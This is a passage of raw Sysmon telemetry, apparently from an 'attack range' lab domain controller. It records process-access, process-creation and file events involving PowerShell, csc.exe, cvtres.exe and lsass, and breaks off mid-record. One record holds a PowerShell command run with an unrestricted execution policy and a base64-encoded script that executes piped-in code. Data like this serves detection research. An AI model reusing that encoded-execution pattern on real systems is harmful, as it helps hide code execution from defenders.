10:39:16.374{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000275Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.374{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000274Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.374{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000273Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.374{733EE690-3C5B-5F80-0500-000000007E01}640656C:\Windows\system32\csrss.exe{733EE690-3DD4-5F80-FE02-000000007E01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000272Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.374{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000271Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.374{733EE690-3DD4-5F80-FD02-000000007E01}26602468C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{733EE690-3DD4-5F80-FE02-000000007E01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000270Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.380{733EE690-3DD4-5F80-FE02-000000007E01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESD374.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCF0BB127BE4F9445789A1E6BFB8163262.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD3-5F80-F456-110000000000}0x1156f40HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{733EE690-3DD4-5F80-FD02-000000007E01}2660C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\twtglkl4.cmdline" 10341000x8000000000000000269Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.296{733EE690-3DD3-5F80-F802-000000007E01}47604960C:\Windows\system32\conhost.exe{733EE690-3DD4-5F80-FD02-000000007E01}2660C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000268Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.296{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000267Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.296{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000266Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.296{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000265Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.296{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000264Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.296{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000263Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.296{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000262Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.296{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000261Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.296{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000260Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.296{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000259Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.296{733EE690-3C5B-5F80-0500-000000007E01}640656C:\Windows\system32\csrss.exe{733EE690-3DD4-5F80-FD02-000000007E01}2660C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000258Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.296{733EE690-3DD3-5F80-FB02-000000007E01}27522112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DD4-5F80-FD02-000000007E01}2660C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+7c19a9|UNKNOWN(00007FFA155AB68F) 154100x8000000000000000257Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.296{733EE690-3DD4-5F80-FD02-000000007E01}2660C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\twtglkl4.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD3-5F80-F456-110000000000}0x1156f40HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{733EE690-3DD3-5F80-FB02-000000007E01}2752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x8000000000000000256Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.280{733EE690-3DD3-5F80-FB02-000000007E01}2752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\twtglkl4.cmdline2020-10-09 10:39:16.280 11241100x8000000000000000255Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.localDLL2020-10-09 10:39:16.280{733EE690-3DD3-5F80-FB02-000000007E01}2752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\twtglkl4.dll2020-10-09 10:39:16.280 10341000x8000000000000000413Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.749{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000412Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.749{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000411Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.749{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C: